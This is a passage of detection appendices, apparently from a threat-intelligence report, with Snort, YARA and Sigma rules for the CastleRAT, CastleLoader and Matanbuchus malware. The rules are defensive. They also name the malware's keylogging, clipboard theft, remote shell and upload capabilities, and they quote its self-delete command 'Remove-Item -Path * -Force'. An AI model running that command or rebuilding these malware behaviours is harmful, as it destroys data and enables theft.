alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|56 EA 59 DB 6B DD 36 81 42 01 C6 84 DF 5A 6B E8 38 14 8D 07|"; fast_pattern; depth:20; reference:url,https://tria.ge/250505-wmbvjabk3t; classtype:trojan-activity; sid:52460310; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|A8 CF 1E 1D BA 27 49 FB 63 38 F4 52 A7 9C 39 CF 4A 85 E5 5B|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460311; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|0F 0D F7 66 4C B2 D5 12 BA 55 CC BB 2E 1B F4 AD C0 E0 7C A2|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-rt355svtfs; classtype:trojan-activity; sid:52460312; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|74 6F D9 7F B5 48 F6 91 26 E0 16 5A 81 29 4F 35 21 6C 61 82|"; fast_pattern; depth:20; reference:url,https://tria.ge/250813-a7c3fadl7z; classtype:trojan-activity; sid:52460313; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|61 57 7C E8 EE BE 56 71 B3 98 F4 A6 87 E3 0C 39 50 0C 29 41|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460314; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|4D 58 29 58 84 15 1B 1D 2A D9 80 90 5C 36 1C A0 43 05 80 48|"; fast_pattern; depth:20; reference:url,https://tria.ge/250701-v6911aykv9; classtype:trojan-activity; sid:52460335; rev:1; metadata:author MGUT, created_at 2025-10-30, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible CastleRAT Python Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:19,norm; content:"|2F|line|2F 3F|fields|3D|16385"; http_uri; depth:19; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250808-w4hpeaxtcw; classtype:trojan-activity; sid:52460315; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147457"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460316; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147505"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250814-wyqstsyjx3; classtype:trojan-activity; sid:52460317; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server; content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147489"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_header; depth:48; reference:url,https://tria.ge/251028-27bcds1nbk; classtype:trojan-activity; sid:52460333; rev:1; metadata:author MGUT, created_at 2025-10-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

Appendix K: Snort Rules for Matanbuchus

alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"Matanbuchus Loader Inbound DNS Tunneled Data ACK"; content:"|AA AA 85 80 00 01 00 01 00 00 00 00 01 30 14|"; fast_pattern; depth:15; content:"|10|"; distance:20; within:1; content:"|00 10 00 01 00 00 00 3C 00 03 02|ok"; distance:0; isdataat:!1,relative; reference:url,https://www.morphisec.com/blog/ransomware-threat-matanbuchus-3-0-maas-levels-up; reference:url,https://tria.ge/250716-b5sksa1wgt; sid:52460327; rev:1; metadata:author MGUT, created_at 2025-09-30, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Matanbuchus Loader Malware Outbound C2 Communication"; flow:established,to_server; content:"POST|20|"; depth:5; content:"|2E|php"; distance:0; content:"1|0D 0A|User-Agent|3A 20|"; distance:0; content:"Host|3A 20|"; distance:0; content:"Content-Length|3A 20|"; distance:0; content:"Content-Type|3A 20|application|2F|x-www-form-urlencoded|0D 0A|Accept-Language|3A 20|"; distance:0; content:"|0D 0A 0D 0A|"; content:!"|26|"; distance:0; content:"|3D|ey"; fast_pattern; distance:0; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost[^\x0d]+\x0d\x0aContent\x2dLength[^\x0d]+\x0d\x0aContent\x2dType[^\x0d]+\x0d\x0aAccept\x2dLanguage[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://tria.ge/240328-t4ge8sbf65; classtype:bad-unknown; sid:52460167; rev:1; metadata:author MGUT, created_at 2024-03-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

Appendix L: Yara Rule for CastleLoader

rule MAL_CastleLoader {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-06"
        description = "Detection of the CastleLoader malware executable"
        version = "1.0"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        hash = "1b6befc65b19a63b4131ce5bcc6e8c0552fe1e1d136ab94bc7d81b3924056156"
        hash = "202f6b6631ade2c41e4762e5877ce0063a3beabce0c3f8564b6499a1164c1e04"
        hash = "25e0008aba82690e0f58c9d9fcfbc5d49820aa78d2f7bfcd0b85fb969180fc04"
        hash = "b45cce4ede6ffb7b6f28f75a0cbb60e65592840d98dcb63155b9fa0324a88be2"
        hash = "fb9de7448e9e30f717c171f1d1c90ac72828803a16ad385757aeecc853479d3c"
        hash = "6444f0e3f78254aef663837562d258a2236a77f810ee8d832de7d83e0fdd5783"
        malware = "CastleLoader"
        malware_id = "8RF9P9"
        category = "MALWARE"
    strings:
        $vmware_check = { 3D 56 4D 77 61 75 ?? 81 7D F8 72 65 56 4D 0F 85 ?? ?? ?? ?? 81 7D F4 77 61 72 65 }
        $api_hashing = { 0F BE 0C 1E 8B C2 F6 C3 01 75 0F C1 E8 03 0F AF C1 8B CA C1 E1 07 33 C1 }
        $stack_str_url = { C7 ?5 [1-4] 74 00 74 00 C7 ?5 [1-4] 69 00 6E 00 C7 ?5 [1-4] 67 00 73 00 }
        $mov_edx_apihash1 = { BA 44 A0 2D 39 } // CreateMutexW
        $mov_edx_apihash2 = { BA 2B C2 86 58 } // GetLastError
        $mov_edx_apihash3 = { BA 94 F9 86 F8 } // RtlAllocateHeap
        $mov_edx_apihash4 = { BA B2 48 70 60 } // ExitProcess
    condition:
        uint16(0) == 0x5A4D and all of them
}

Appendix M: Yara Rules for CastleRAT

rule MAL_CastleRAT_Python {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-18"
        description = "Detection of the python variant of CastleRAT malware"
        version = "1.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        reference = "https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview"
        hash = "94dc0f696a46f3c225b0aa741fbd3b8997a92126d66d7bc7c9dd8097af0de52a"
        hash = "53775af67e9df206ed3f9c0a3756dbbc4968a77b1df164e9baddb51e61ac82df"
        malware = "CastleRAT"
        malware_id = "9WCga-"
        category = "MALWARE"
        actor = "TAG-150"
        actor_id = "9nk6DO"
    strings:
        $cmd1 = "S_CONNECT" fullword
        $cmd2 = "S_COMMAND" fullword
        $cmd3 = "S_PING" fullword
        $cmd4 = "S_CMD" fullword
        $cmd5 = "S_DELETE" fullword
        $cmd6 = "S_POWERSHELL" fullword
        $cmd7 = "S_START_TERMINAL" fullword
        $cmd8 = "S_SESSION_MESSAGE" fullword
        $cmd9 = "S_UPLOAD" fullword
        $fun1 = "CheckElevation():" fullword
        $fun2 = "GetHWID("
        $fun3 = "GetOS("
        $fun4 = "GetIpGeo("
        $fun5 = "rc4createkeyA("
        $fun6 = "EncryptDecryptBufA("
        $fun7 = "RecvTimeout("
        $fun8 = "Send("
        $fun9 = "Connect("
        $fun10 = "ThreadPing("
        $fun11 = "ThreadRecvTerminal("
        $fun12 = "ThreadTerminalSession("
        $fun13 = "ThreadUploadFile("
        $fun14 = "SelfDelete()" fullword
    condition:
        filesize < 50KB and
        7 of ($cmd*) and
        10 of ($fun*)
}

rule MAL_CastleRAT_C {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-18"
        description = "Detection of the C variant of CastleRAT malware"
        version = "2.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        reference = "https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview"
        hash = "1ff6ee23b4cd9ac90ee569067b9e649c76dafac234761706724ae0c1943e4a75"
        hash = "e6bcdf375649a7cbf092fcab65a24d832d8725d833e422e28dfa634498b00928"
        hash = "67cf6d5332078ff021865d5fef6dc61e90b89bc411d8344754247ccd194ff65b"
        hash = "963c012d56c62093d105ab5044517fdcce4ab826f7782b3e377932da1df6896d"
        hash = "60125159523c356d711ffa1076211359906e6283e25f75f4cf0f9dc8da6bf7b0"
        hash = "cf202498b85e6f0ae4dffae1a65acbfec78cc39fce71f831d45f916c7dedfa0c"
        malware = "CastleRAT"
        malware_id = "9WCga-"
        category = "MALWARE"
        actor = "TAG-150"
        actor_id = "9nk6DO"
    strings:
        $log_tag1 = "clipboardlog.txt" fullword wide
        $log_tag2 = "keylog.txt" fullword wide
        $wnd_class1 = "IsabellaWine" fullword wide
        $wnd_class2 = "camera!" fullword wide
        $log_fmt1 = "[%02d:%02d %02d.%02d.%02d] %ws" fullword wide
        $log_fmt2 = "[%02d:%02d %02d.%02d.%02d] " fullword wide
        $log_fmt3 = "[%02d.%02d.%02d %02d:%02d] " fullword wide
        $s1 = "(VPN)" wide ascii
        $s2 = "rundll32 \"C:\\Windows\\System32\\shell32.dll\" #61"  wide
        $s3 = "\"%ws\" -no-deelevate" fullword wide
        $s4 = "IsWindowVisible" fullword ascii
        $s5  = "UAC_InputIndicatorOverlayWnd" fullword wide
        $s6 = "www.ip-api.com" fullword wide
        $s7 = "MachineGuid" fullword wide
        $s8 = "line/?fields=" wide
        $s9 = "C:\\Windows\\System32\\cmd.exe" wide
        $s10  = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" fullword wide

     condition:
       uint16(0) == 0x5a4d and
       any of ($log_tag*) and
       any of ($wnd_class*) and
       any of ($log_fmt*) and
       all of ($s*)
}

rule MAL_CastleRAT_Shellcode_Loader {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-10-20"
        description = "Detection of a python based shellcode loader that runs CastleRAT malware"
        version = "1.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        hash = "058d83fd8834246d6d2a2771e6e0aeb4d4ef8a6984cbe1133f3a569029a4b1f7"
        hash = "190e673787bfc6e8eeebccd64c8da61747d5be06f87d3aea879118ef1a9f4836"
        malware = "CastleRAT"
        actor = "TAG-150"
        actor_id = "9nk6DO"
        category = "MALWARE"
        malware_id = "9WCga-"
    strings:
        $s1 = "SHELL64_OFFSET = "
        $s2 = "SHELL32_OFFSET = "
        $s3 = "SHELLFUNC = WINFUNCTYPE"
        $s4 = "LoadPE_Shell"
        $s5 = "crt = WinDLL(\"msvcrt.dll\");"
        $s6 = "OPEN_EXISTING" fullword
        $s7 = ".VirtualProtect("
        $s8 = "offset"
        $s9 = "from ctypes"
    condition:
        filesize < 50KB and $s9 at 0 and all of them
}

Appendix N: CastleRAT Sigma Rules

title: CastleRAT C Variant Malware Log File Creation
id: 4d785ac8-17fe-4765-b427-9a31073ad1a7
status: stable
description: Detects CastleRAT C variant malware log file creation events. The log file is used to store output from the keylogger and clipboard stealer.
references:
  - https://tria.ge/250701-v6911aykv9
  - https://tria.ge/251101-r8f9xstjap
author: Insikt Group, Recorded Future
date: 2025-08-29
level: high
tags:
  - attack.t1608 # Stage Capabilities
  - attack.t1074.001 # Local Data Staging
  - attack.t1115 # Clipboard Data
  - attack.t1056.001 # Keylogging
logsource:
  product: windows
  category: file_event
detection:
  castlerat_logs:
    TargetFilename|endswith:
      - '\AppData\Local\Temp\MuuuuuhGer3'
      - '\AppData\Local\Temp\PluhhSuk3'
      - '\AppData\Local\Temp\AsdDsaHaha3'
      - '\AppData\Local\Temp\ChuChuka'
      - '\AppData\Local\Temp\GagikMaraguiSS'
      - '\AppData\Local\Temp\LowUshrSudujes'
      - '\AppData\Local\Temp\RarnuiKarta'
      - '\AppData\Local\Temp\GrazGraznii'
      - '\AppData\Local\Temp\GiveGvein3'
      - '\AppData\Local\Temp\BeruiowdgsouiHTR'
      - '\AppData\Local\Temp\GDSongdsgndohSDU'
      - '\AppData\Local\JohniiDepp'
      - '\AppData\Local\LuchiiSvet'
      - '\AppData\Local\HmmMaybe'
  condition: castlerat_logs
falsepositives:
  - Unlikely

title: CastleRAT Python Malware Self Deletion
id: 1050a0c4-1110-4b55-938c-0d27259ddd1e
status: stable
description: Detects the execution of powershell by the Python variant of CastleRAT malware to delete itself.
references:
  - https://tria.ge/250822-r3a6qaak2t
author: Insikt Group, Recorded Future
date: 2025-08-28
tags:
  - attack.t1070.004   # Indicator Removal: File Deletion
logsource:
    product: windows
    category: process_creation
detection:
    self_delete:
        CommandLine|endswith: 'powershell Start-Sleep -Seconds 4; Remove-Item -Path * -Force; exit'
    condition: self_delete
level: high
falsepositives:
  - Potential benign installer activity

title: CastleRAT C Malware Self Deletion
id: 79268bc8-3220-447d-bc7a-02199bed58e9
status: stable
description: Detects the execution of powershell by the C variant of CastleRAT malware to delete itself.
references:
  - https://tria.ge/251101-lh19hstqft/behavioral2
author: Insikt Group, Recorded Future
date: 2025-11-06
tags:
  - attack.t1070.004   # Indicator Removal: File Deletion
logsource:
    product: windows
    category: process_creation
detection:
    self_delete:
        CommandLine|endswith: 'powershell Start-Sleep -Seconds 3; Remove-Item -Path * -Force'
    condition: self_delete
level: high
falsepositives:
  - Potential benign installer activity

Appendix O: MITRE ATT&CK Techniques